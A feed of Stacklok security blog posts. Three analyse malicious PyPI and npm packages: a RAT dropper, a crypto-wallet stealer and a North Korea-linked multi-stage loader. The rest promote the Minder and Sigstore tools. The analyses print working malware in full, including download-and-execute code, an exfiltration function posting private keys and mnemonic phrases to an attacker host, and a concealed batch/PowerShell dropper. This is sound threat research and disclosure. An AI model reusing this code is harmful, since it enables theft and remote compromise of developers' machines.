Forem: Ariel

Cross-platform RAT deployed by weaponized 'requests' clone

Ariel — Fri, 30 Aug 2024 18:15:31 +0000

Initial discovery with Trusty

On August 29th, Stacklok’s automated threat detection platform alerted us to the presence of malicious code in a newly published PyPI package named invokehttp.

This package raised red flags due to inconsistencies in its metadata and the absence of any verified connection to its claimed GitHub repository.

Several anomalies in the package metadata triggered further inspection:

Failed Proof-of-Origin checks: The package claimed to be associated with the GitHub repository undetected-chromedriver, but other packages held stronger claims to this repository.
Versioning: Despite being newly created, the package claimed a version number of 2.5.5.
Homepage link: The package homepage was set to an unrelated URL, google.com, which is unusual and could indicate some carelessness in design

On first glance, the package might look like a legitimate library for facilitating HTTP requests in Python. Eagle-eyed readers may note that the Quick Start code in the description bears a striking resemblance to Python’s widely-used requests library. Upon comparison we found the code had been largely lifted from requests, with a few nefarious additions in the __init__.py file.

Interestingly, rather than being a direct starjacking attempt on requests (which involves hijacking the reputation of popular packages), the attacker opted to link the package to a popular Selenium ChromeDriver GitHub repository. This has the same effect of exploiting the repository’s high number of stars, forks, and followers, adding a layer of credibility to invokehttp.

The source code for requests has likely been copied to bulk out the package and lend it some legitimacy upon quick visual inspection.

Weaponization

In the __init__.py file, base64.b64decode() is imported and aliased as invoke(), a defense evasion tactic intended to bypass string-based detection mechanisms.

Hidden in between blocks of the legitimate requests functions, the attacker has inserted an exec() call to execute content from a decoded Base64 script.

Decoding the script, we can immediately see malicious intent.

import os as borrow
import platform as blacktrone
from subprocess import Popen as pickachu

try:
    import requests as takihao
except:
    borrow.system('pip install requests')
    import requests as takihao

if blacktrone.system() == "Windows":
    papirus = borrow.path.join(borrow.getenv('TEMP'), 'marshal.exe')
    if not borrow.path.exists(papirus):
        with open(papirus, 'wb') as f:
            f.write(takihao.get('https://github.com/user-attachments/files/16791956/marshal.txt').content)
        pickachu(papirus)
else:
    papirus = borrow.path.join(borrow.getenv('TEMP'), 'trezznor')
    if not borrow.path.exists(papirus):
        with open(papirus, 'wb') as f:
            f.write(takihao.get('https://github.com/user-attachments/files/16791996/trezznor.txt').content)
        pickachu(papirus)

The script aliases commonly used modules (os, platform, Popen, requests) with obscure names (borrow, blacktrone, pickachu, takihao), aiming to confuse analysis.

The script first attempts to import the legitimate requests as takihao, and installs it if the library is not available, ensuring that the downloader executes successfully.

Depending on the operating system, the script then downloads and executes a second-stage payload - either marshal.exe for Windows or trezznor for Linux-based systems. These executables are fetched from GitHub in text format, then written to the system’s temporary directory and executed.

Second-stage payloads

Properties

PE sample	-
File Name	marshal.exe
File type	PE AMD64
Compiler	Go (1.22.3)
Compilation operating system	Windows(7)
SHA256	84ccffd89ef262ce8475801bfc751fec381ee613f38f78b1c0974716ad32bab8
ssdeep	98304:Xe4XgjYxTRCe5EdjYPAiZKAKeubMzKCkS3wJYBHchffSCmA:XbWYxTodeZ2euMHkSge

ELF sample	-
File name	trezznor
File type	ELF AMD64
Compiler	Go
Size	7.6 MB (8003072 bytes)
SHA256	6c2fb04f81fe0631d6765720af92aa9969f10766281fbc32b6f77889b50b87cd
ssdeep	98304:PcAOESpxJOZEQn7gtvysOWxwaxcjkQbOxiH4lX0Og:EjpxJtdysTxwkBiIA

Capabilities

Both samples are packed Go-based executables.

Static analysis checks, such as reviewing API imports, offers great insight into the intended use of the executable. Here we will review the PE in some detail, but highly similar conclusions were drawn for the ELF counterpart.

Since the executable is statically-linked, tools like Blint Binary Linter can be used to parse its technical capabilities using both the Win32 imports and the Golang imports.

Many Win32 APIs associated with advanced thread and memory management were imported, such as SuspendThread, ResumeThread, SetThreadContext, and GetThreadContext.

Amongst others, this would imply the sample has remote process injection capabilities. Manipulating the execution flow of threads is a method used to carry out keylogging or screen capturing, common activities for remote access trojans.

Additionally, the presence of functions related to file creation, writing, and system information gathering suggests that the payload is designed to collect and store data on the system, likely with the intent of later exfiltration.

Finally, analysis revealed references to Telegram and Tor onion addresses, which are commonly associated with encrypted communication channels and command-and-control (C2) operations.

Overall, the findings are strongly consistent with the profile of a Remote Access Trojan. They suggest that the payload has functionalities for remote command execution, system control, data exfiltration, and detection evasion.

Indicators of Compromise

Files

Filenames	SHA256
`marshal.exe`	84ccffd89ef262ce8475801bfc751fec381ee613f38f78b1c0974716ad32bab8
`trezznor`	6c2fb04f81fe0631d6765720af92aa9969f10766281fbc32b6f77889b50b87cd
`invokehttp-2.5.5-py3-none-any.whl`	1ca29c9484acb099f7182c3c5cb876308b7a8853288102523edcd6852021811d
`invokehttp-2.5.5/__init__.py`	9126e951c1bf09d6122216ee9f7897590b3593b451fbe4e068955b5cdaa70531

IP addresses

149.154.167.220
20.26.156.215
142.250.185.81
103.250.232.39
209.196.144.2
109.202.202.202
91.189.91.43
91.189.91.42

Responsible disclosure

Shortly after our threat detection engine flagged the invokehttp package, we reported it to PyPI maintainers. The package was quickly quarantined on the PyPI registry, preventing any further installations of the malicious library.

On August 30, PyPI removed invokehttp from the registry.

NPM packages leveraged for cryptocurrency theft

Ariel — Fri, 02 Aug 2024 20:24:32 +0000

Author: @poppysec

On August 1st, the Trusty threat detection platform alerted us to 4 suspicious npm packages published by the same author basedb58 over the past day.

Our investigation revealed that upon installation, a malicious script bundled with these packages attempts to locate and exfiltrate cryptocurrency wallet secrets from the user’s Desktop.

Package provenance

As an indicator of supply chain risk, Trusty attempts to establish a proof of origin verification for published packages to their GitHub source repository. These packages all claimed https://github.com/jimeh/node-base58 as their repository URL, in an effort to starjack as the more popular npm package base58.

Trusty was unable to match the packages to this source repository. This is reflected in the provenance scoring given, taking the package ndoe-fethc as an example.

In comparison, for the legitimate package, Trusty was able to map all 5 package releases to historical Git tags, validating the repo claim and verifying proof of origin.

As an aside, note the package has not been updated for 6 years. Amongst other signals, this has negatively impacted its overall Trusty score.

Preinstall hook

Returning to our example ndoe-fethc, the author has ensured execution of the script unhook upon installation by the addition of a preinstall hook, as can be seen in the package.json.
Other metadata - such as the author and contributor information - has been copied from the legitimate package, and as such are not relevant.

{
  "name": "ndoe-fethc",
  "version": "2.3.2",
  "keywords": [
    "base58, flickr"
  ],
  "description": "Flickr Flavored Base58 Encoding and Decoding",
  "license": "MIT",
  "author": {
    "name": "Jim Myhrberg",
    "email": "contact@jimeh.me"
  },
  "contributors": [
    "Louis Buchbinder github@louisbuchbinder.com"
  ],
  "repository": {
    "type": "git",
    "url": "https://github.com/jimeh/node-base58.git"
  },
  "main": "./src/base58",
  "engines": {
    "node": ">= 6"
  },
  "devDependencies": {
    "eslint": "^5.6.0",
    "eslint-config-prettier": "^3.0.0",
    "eslint-plugin-prettier": "^2.7.0",
    "mocha": "^5.2.0",
    "prettier": "^1.14.3"
  },
  "scripts": {
    "lint": "eslint .",
    "lint-fix": "eslint . --fix",
    "test": "mocha",
    "preinstall": "node ./src/unhook"
  }
}

Cryptocurrency stealing

The following script, which can be reviewed in full on Stacklok’s jail repository, has clear indicators of crypto-stealing capabilities:

Private key and mnemonic phrase enumeration
Exfiltrating stolen data to a remote server
Targeting specific file extensions

Let’s dissect the script in stages.

Setup and definitions

The wordlist array contains 2048 words. This is typically the size of a BIP39 word list, used for generating mnemonic phrases in cryptocurrency wallets.

The script also defines some directories and files to be ignored, along with setting the allowed extensions to process.

const fs = require('fs/promises');
const os = require("os");
const path = require('path');
const fetch = require('node-fetch');
const b39 = require('bip39'); // For validating mnemonic phrases

// Predefined word list used for mnemonic validation
const wordlist = [
"abandon",
"ability",
"able",
"about",
"above",
"absent",
"absorb",
"abstract",
"absurd",
"abuse",
"access",
  // (list of words truncated for brevity)
];

const wait = (ms) => new Promise((resolve) => setTimeout(resolve, ms * 1000));

const IGNORED_DIRS = ['node_modules', 'target', 'build', 'webpack', '.vscode'];
const IGNORED_FILES = ['package-lock.json', 'package.json', 'webpack'];
let dupes = []; // To store unique sensitive information found
const ALLOWED_EXTENSIONS = new Set(['.js', '.cjs', '.txt', '.json', '.mjs', '.py', '.csv', '.ts', '.env']);
let proms = []; // To store mnemonics before sending

Scanning for cryptocurrency wallet information

The main body of the stealer functionality is contained here, in the function iter(). This recursively searches through directories and reads files of specified extensions to scan for sensitive crypto wallet information such as private keys and mnemonic phrases.

// Function to recursively iterate through directories and process files
async function iter(dir) {
  let entries;
  try {
    entries = await fs.readdir(dir, { withFileTypes: true }); // Read directory contents
  } catch {
    // Handle errors silently
  }

  for (const entry of entries) {
    const fullPath = path.join(dir, entry.name);

    if (entry.isDirectory()) {
    // If entry is a directory and not ignored, recursively process it
    if (!IGNORED_DIRS.includes(entry.name)) {
        await iter(fullPath);
    }
    } else if (entry.isFile()) {
    // If entry is a file and not ignored, process it
    if (IGNORED_FILES.includes(entry.name)) continue;

    const ext = path.extname(entry.name);
    if (ALLOWED_EXTENSIONS.has(ext)) {
        try {
        const content = await fs.readFile(fullPath, 'utf-8');
        if (content.split('\n').length < 1000) {
            for (const line of content.split('\n')) {
            try {
                // Check for lines indicating private key presence
                if (line.includes("Keypair.fromSecretKey(Uint8Array.from([") ||
                    line.includes("Keypair.fromSecretKey(bs58.decode(") ||
                    line.toString().toLowerCase().includes("privatekey=")) {
                if (line.length < 1000 && !dupes.includes(line)) {
                    dupes.push(line);
                    await gsa(line); // Exfil private keys to the remote server
                }
                }
            } catch {}

            // Check for mnemonic phrases
            let start = false;
            let arr = [];
            const linerep = line.replace(/[^a-zA-Z]/g, ' ');
            if (linerep.length < 1000) {
                for (const each of linerep.split(' ')) {
                if (each !== ' ' && each.length > 0 && each !== '\n') {
                    if (wordlist.includes(each)) {
                    if (!start) {
                        start = true;
                    }
                    if (start) {
                        arr.push(each);
                    }
                    } else {
                    if (start) {
                        start = false;
                        break;
                    }
                    }
                }
                }
                if (arr.length > 10) {
                const arrjoin = arr.join(' ');
                if (b39.validateMnemonic(arrjoin)) {
                    if (!dupes.includes(arrjoin)) {
                    dupes.push(arrjoin);
                    proms.push(arrjoin);
                    if (proms.length >= 2) {
                        try {
                        await gsa(proms); // Exfil mnemonics
                        proms = [];
                        } catch {proms = []}
                    }
                    }
                }
                }
            }
            }
        }
        } catch {}
    }
    }
  }
}

Data exfiltration

Extracted data is sent in JSON form to an attacker-controlled domain using fetch().

async function gsa(data) {
  await fetch("https://mainnet.beta-mainnet.workers.dev/", {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(data)
  });
}

The attacker has abused Cloudflare’s workers.dev service to host their exfiltration site.

Finally, the ite() simply passes the user’s Desktop directory path to the iter() function, starting the recursive stealing from there.

// Function to start the process from the user's Desktop directory
async function ite() {
  const dp = path.join(os.homedir(), 'Desktop');
  await iter(dp);
}

ite();

Summary

We reported these packages to npm within a day of their publication. The GitHub Trust & Safety team responded swiftly, removing the packages and deleting the associated npm account.

In the brief time they were live, the packages had around 50 downloads each.

This latest incident continues to highlight the vulnerability of the open source ecosystem to abuse by malicious actors using it as a vector to distribute malware.

Attackers can easily create disposable accounts to publish harmful packages that mimic legitimate ones, exploiting the trust developers place in popular repositories and packages. In this case, affected users could have had their cryptocurrency wallets compromised.

Verification of package provenance, such as Trusty's proof of origin checks, is crucial in reducing supply chain risk. But this is just one aspect of assessing safety and trustworthiness in a complex network of maintainers, contributors, repositories, versions, and transitive dependencies.

Our Trusty package detection system ingests various metadata signals to provide an amalgamated score as a proxy for supply chain risk.

North Korean State Actors Exploit Open Source Supply Chain via Malicious npm Package

Ariel — Wed, 24 Jul 2024 22:15:31 +0000

Author: @poppysec
The original post can be found here

On 22nd July, the Trusty threat detection team discovered a malicious npm package published an hour prior. Our package detection system analyzes a number of metadata signals to identify anomalies in the open source package ecosystem.

As such, Trusty flagged the package next-react-notify as suspicious. Further investigation revealed a complex, multi-stage attack chain.

The malicious package is a modified copy of call-bind, a popular npm package with almost 50 million downloads a week. Several script files have been added to the package, including tocall.js, which is responsible for the malicious download and decryption functionality.

One of the first indicators of evasive execution was the presence of a preinstall entry in the package.json file, which functions to execute and delete this script upon installation in the following pattern:

node <script>.js && del <script>.js

Attribution to North Korean APT

Previous reporting by Phylum (Jul 2024, Nov 2023) highlighted techniques and procedures with notable similarities to those observed in the current sample.

A comprehensive reverse engineering analysis of the final binary by QiAnXin Threat Intelligence Center (Dec 2023) concluded that the attack could be attributed to the North Korean state-sponsored Lazarus Group (APT38).

This package remained live on npm for less than 4 hours before being unpublished; a tactic frequently employed by North Korean groups leveraging the OSS supply chain vector.

The attack chain mirrors patterns reported in previous incidents in initial execution strategies, download mechanisms, hosting infrastructure, and post-execution cleanup processes.

Unlike related packages published in late 2023, which were cryptocurrency-themed, this sample did not focus on cryptocurrency. Instead, it appeared to target developers more broadly, remaining aligned with social engineering tactics typically employed by actors supporting North Korean objectives.

Considering the documented history of open source supply chain attacks by North Korean state-aligned groups and the clear commonalities with earlier samples over the past year, we assert with reasonable confidence that this activity constitutes a continuation of the same campaign observed earlier this month. However, due to overlapping TTPs and infrastructure, we will avoid attribution to any particular group.

Trusty Scoring

The package had the lowest possible scoring for repository and author activity. No repository URL had been linked to the package, casting further doubt on its provenance. This differs from previous Lazarus-associated samples, where the linked repository has been a key pivot point for security researchers in mapping out the campaign.

Technical Details

tocall.js

The contents of tocall.js can be seen below, with the remote hosting server IP defanged by us.

const os = require("os");
const fs = require("fs");
const { exec } = require("child_process");

const str1 = `
@echo off
curl -o though.crt -L "http://166.88.61[.]72/explorer/search.asp?token=3092" > nul 2>&1
start /b /wait powershell.exe -ExecutionPolicy Bypass -File yui.ps1 > nul 2>&1
del "yui.ps1" > nul 2>&1
if exist "soss.dat" (
  del "soss.dat" > nul 2>&1
)
rename tmpdata.db soss.dat > nul 2>&1
if exist "soss.dat" (
  rundll32 soss.dat, SetExpVal tiend
)
if exist "mod.json" (
  del "package.json" > nul 2>&1
  rename mod.json package.json > nul 2>&1
)
ping 127.0.0.1 -n 2 > nul
if exist "soss.dat" (
  del "soss.dat" > nul 2>&1
)`;

const str2 = `
$path1 = Join-Path $PWD "though.crt"
$path2 = Join-Path $PWD "tmpdata.db"
if ([System.IO.File]::Exists($path1))
{
  $bytes = [System.IO.File]::ReadAllBytes($path1)
  for($i = 0; $i -lt $bytes.count; $i++)
  {
    $bytes[$i] = $bytes[$i] -bxor 0xc5
  }
  [System.IO.File]::WriteAllBytes($path2, $bytes)
  Remove-Item -Path $path1 -Force
}`;

const osType = os.type();

if (osType === "Windows_NT") {
  const fileName = "execu.bat";
  const psfileName = "yui.ps1";
  fs.writeFile(fileName, str1, (err) => {
    if (!err) {
      fs.writeFile(psfileName, str2, (err) => {
        if (!err) {
          const child = exec(`"${fileName}"`, (error, stdout, stderr) => {
            if (error) {
              return;
            }
            if (stderr) {
              return;
            }
            fs.unlink(fileName, (err) => {});
          });
        }
      });
    }
  });
}

The script executed and deleted by the preinstall firstly enumerates the host operating system. If the affected host is a Windows machine, it will then attempt to write the contents of str1 into execu.bat in the current directory. If successful, the contents of str2 will similarly be written into yui.ps1. The batch script is then executed using exec(), and the file is deleted.

Downloader batch script

@echo off
curl -o though.crt -L "http://166.88.61.72/explorer/search.asp?token=3092" > nul 2>&1
start /b /wait powershell.exe -ExecutionPolicy Bypass -File yui.ps1 > nul 2>&1
del "yui.ps1" > nul 2>&1
if exist "soss.dat" (
del "soss.dat" > nul 2>&1
)
rename tmpdata.db soss.dat > nul 2>&1
if exist "soss.dat" (
rundll32 soss.dat, SetExpVal tiend
)
if exist "mod.json" (
del "package.json" > nul 2>&1
rename mod.json package.json > nul 2>&1
)
ping 127.0.0.1 -n 2 > nul
if exist "soss.dat" (
del "soss.dat" > nul 2>&1
)

The batch script saved as execu.bat takes some precautionary measures to discard errors, hide command prompt output, and delete files. This ensures that execution is concealed from the user.

An encrypted second stage is downloaded via curl from the remote server hosted at 166.88.61[.]72 and output as though.crt.

This IP address has previously been resolved to cryptocopedia[.]com, a domain associated with North Korean APTs in Phylum’s report on the call-blockflow npm package published 4 July 2024.

The next lines of the batch script use PowerShell to execute the script yui.ps1 before deleting it. We will jump into yui.ps1 before discussing the rest of execu.bat.

Payload decryption

$path1 = Join-Path $PWD "though.crt"
$path2 = Join-Path $PWD "tmpdata.db"
if ([System.IO.File]::Exists($path1))
{
    $bytes = [System.IO.File]::ReadAllBytes($path1)
    for($i = 0; $i -lt $bytes.count; $i++)
    {
        $bytes[$i] = $bytes[$i] -bxor 0xc5
    }
    [System.IO.File]::WriteAllBytes($path2, $bytes)
    Remove-Item -Path $path1 -Force
}

The script first defines paths in the current working directory for the downloaded though.crt, and a file which does not yet exist, tmpdata.db. It then enters a loop where each byte of though.crt is bitwise XOR decrypted with the key 0xc5, and the result is written to the DB file stated. This decrypted file is a 64-bit DLL with a misleading file extension.

The initial CRT file is then deleted, and execution returns to the batch script.

Execution

This resulting DLL is then renamed to soss.dat. Using the Windows LOLBin rundll32, the DLL’s sole exported function SetExpVal is executed with the parameter tiend.

rename tmpdata.db soss.dat > nul 2>&1
if exist "soss.dat" (
rundll32 soss.dat, SetExpVal tiend
)

Cleanup

As mentioned, during the course of execution the threat actor took several steps to cover their tracks, such as deleting any files dropped on disk, and hiding traces of execution. Significantly, the malicious package.json is removed and replaced with a benign version, mod.json, which does not contain the key preinstall script entry.

if exist "mod.json" (
del "package.json" > nul 2>&1
rename mod.json package.json > nul 2>&1
)
ping 127.0.0.1 -n 2 > nul
if exist "soss.dat" (
del "soss.dat" > nul 2>&1
)

Hence after installing the package via npm, the user would remain unaware that any malicious activity had occurred.

Second-stage DLL - soss.dat

Properties

-	-
File Name	soss.dat
File Type	PE DLL, 64-bit
Compilation operating system	Windows Vista
Time date stamp	2024-07-10 15:45:13
Size	102.50 KB (104960 bytes)
SHA256	43a28fc5a1ee46da0e5698fed473802ab6af5f83233b9287459ec2e0f6250efa
ssdeep	384:ga7wez/uXHFCZBem2Wx6MN99Sjvb99SjvWpN:g0bz/QHFCTemFL9Sbh9Sb
PDB file name	D:\workstation\codingStation\C_Workstation\2024\Simple Dll\x64\Release\Simple Dll.pdb

Evasion and anti-analysis

We are continuing to analyze the decrypted payload DLL, but initial examination of both the import functions and the most relevant subroutines after disassembly suggests a considerable level of sophistication, with several layers of defense against detection and debugging.

Static analysis of the DLL revealed various anti-analysis and anti-debugging techniques. We also noted the use of stack unwinding, which could be utilized to evade detection via call stack tracing (a feature of some EDRs).

The sample was first submitted to VirusTotal on 2024-07-12. At the time of writing, automated sandboxes detections remain relatively sparse due to these successful anti-analysis efforts.

IsProcessorFeaturePresent

The Windows API function IsProcessorFeaturePresent is invoked with the argument 0x17 - where 0x17 corresponds to PF_FASTFAIL_AVAILABLE. This is used to check if the __fastfail option is available. If not, the process is terminated immediately with RtlFailFast (int 0x29).

Excerpt of sub_180001020

QueryPerformanceCounter

In subroutine sub_18000150c, we observed the use of the Windows API QueryPerformanceCounter.

While this function can identify long delays caused by a debugger, in this context, it appears to be part of a unique identifier generation process. This identifier potentially forms a mutex name and is derived from system time, thread ID, and process ID through a series of XOR operations and bitwise shifts.

Excerpt of sub_18000150c

Call stack spoofing

Subroutine sub_18000192C implements a stack walk by capturing the current execution context RtlCaptureContext, looking up each function entry RtlLookupFunctionEntry, and then unwinding the stack with RtlVirtualUnwind. The context record is updated to a new address, and further memory manipulation is carried out.

By doing this the malware can dynamically modify the return address and adjust call stack frames to create the facade of a benign call stack, avoiding inspection by EDRs.

This is an effort to frustrate analysis and hide the true execution flow.

Exception handling

Later in sub_18000192C, the API IsDebuggerPresent is used, storing the result in the rbx register. SetUnhandledExceptionFilter and UnhandledExceptionFilter can be used in combination to check for the presence of a debugger by replacing the top-level exception handler. If these checks pass, another subroutine is called.

Further stages

The DLL also contains functionality to decrypt a later-stage payload.

Given our initial analysis as well as the findings from the detailed report by QiAnXin in late 2023, it is likely that this DLL acts as an intermediary stage before the final payload is fetched, possibly via multiple further loading stages.

IOCs

URL
http://166.88.61[.]72/explorer/search.asp?token=3092

SHA256
soss.dat
43a28fc5a1ee46da0e5698fed473802ab6af5f83233b9287459ec2e0f6250efa

though.crt
9d27159f34d4534afaa3f3e8de51c4d9b2e4001235633bac43bd7d3772cb774e

next-react-notify-1.0.0.tgz337c114002a8b25b1ee47546b637391d413a2bfb7275c439c8758a23fc77e441

tocall.js
B57b75d015526b862ae469b825c7a18a157927e0c9415050f1abe9df67523520

The contents of the next-react-notify package can be reviewed in full on Stacklok’s jail repository on GitHub.

DestroyLoneliness: npm starjacking attack on Roblox Node.js library delivers QuasarRAT

Ariel — Thu, 11 Jul 2024 18:01:40 +0000

The execution of QuasarRAT would allow the attacker to establish command and control over affected Windows endpoints.

Author: Poppaea McDermott

Trusty is a free-to-use web app from Stacklok that analyzes data about thousands of open source packages and ranks them based on their supply chain risk. Trusty looks at factors like repo and author activity; the presence of security best practices, like artifact signing; and the presence of malicious activity, like typosquatting and starjacking.

Earlier this week, Trusty's threat analysis system, developed by Stacklok, was able to interpret the noblox-ts package as suspicious. Read on for our analysis on this package.

Discovering the attack

You can see a UI expression of the scoring for this package below in Trusty:

Starjacking is a tactic used by threat actors to misdirect users into downloading a malicious package by imitating a popular or highly-rated project. The information copied can include metadata such as the description and star rating.

Trusty ingests package provenance information, allowing the identification of anomalies around source of origin.

To read the rest of the post, click here

Demo: Automating GitHub Repo Configuration and Security with Minder

Ariel — Mon, 17 Jun 2024 23:26:02 +0000

If you're like many project owners or maintainers, your software project might span tens or hundreds of GitHub repos, and your repo configuration may be wildly variable. How do you make sure that your repos always have a standard configuration in place, like a code of conduct, a security.md file, a license file, secret scanning, and Dependabot? It's a lot to remember and to continuously monitor. Fortunately, you don't have to—there are free tools like Minder available to help.

In this demo, Stacklok engineer Eleftheria Stein-Kousathana demos how to use Minder, an open source software supply chain security platform, to help you keep your GitHub repos consistently configured and secure for your end users.

Try it out at https://cloud.stacklok.com
Read the docs at https://docs.stacklok.com

OpenSSF Case Study: Enhancing Open Source Security with Sigstore at Stacklok

Ariel — Tue, 04 Jun 2024 16:15:57 +0000

Stacklok was founded in 2023 by Craig McLuckie (co-creator of Kubernetes) and Luke Hinds (creator of the OpenSSF project Sigstore), with the goal of helping developers produce and consume open source software more safely.

As malicious attacks on open source software continue to grow in number and become more sophisticated (like the recent XZ Utils incident), governments and organizations are calling for increased security and protection against these attacks. Yet open source maintainers—who are often unpaid volunteers, with other full-time jobs—lack the time to stay up to speed on security best practices, and access to freely available tools that can proactively keep their software secure.

To help open source communities and developers produce and consume open source software more safely, Stacklok is harnessing the power of Sigstore, highlighted in this case study.

Read the rest of the case study here

Blocking unsafe open source dependencies in pull requests with Minder and OSV.dev

Ariel — Wed, 29 May 2024 23:07:46 +0000

Using data from the open source OSV.dev project and other sources, Minder can now block pull requests that contain malicious and deprecated packages, so that they can’t inadvertently be merged into your code.

Most teams today use vulnerability scanners to find CVEs in their open source dependencies. While avoiding dependencies with known vulnerabilities is important, these scanners may neglect to flag malicious or deprecated packages that don’t have any CVEs, even though these packages may pose an even greater threat to your supply chain.

Read the full article by Yolanda Robla & Adolfo "Puerco" García Veytia here

Tutorial: Using Minder to automate management of source code repository configuration and security

Ariel — Thu, 23 May 2024 22:36:21 +0000

Open Source maintainers, if you're tired of trying to make sure every project repo has a security.md file, protections enabled, Dependabot configured, etc--Minder can help you automate this, and it's free for public repos. Here's how.

Demo: Minder, a software supply chain security platform from Stacklok

Ariel — Fri, 10 May 2024 17:53:31 +0000

Automated remediation is a core feature of the Minder platform. We want to help developers catch security issues before they merge their code AND we want to make it easier for them to resolve those issues (e.g., not just listing manual remediation steps).

This demo from Stacklok engineer Evan Anderson shows how Minder helps you auto-remediate issues from repo configuration drift to automatically pinning all of your GitHub Actions to commit SHAs.

See the demo here

Unlocking secure software distribution with Minder and GitHub Artifact Attestations

Ariel — Fri, 03 May 2024 17:38:01 +0000

Yesterday, GitHub announced an important new security feature called GitHub Artifact Attestations. It's powered by sigstore (a technology created by our CTO, Luke Hinds) and it helps developers generate and verify signed attestations for anything made with GitHub Actions.

We participated in the private beta for this and have already integrated support into Minder. Specifically, you can now use Minder to apply enhanced security policies using the contents of these signed attestations—for example, validating SBOM data like licenses, or verifying the results of an attested security scan.

Here are some more details on this feature, and tutorials on how to verify signed attestations and apply policies using attestation data in Minder: More info here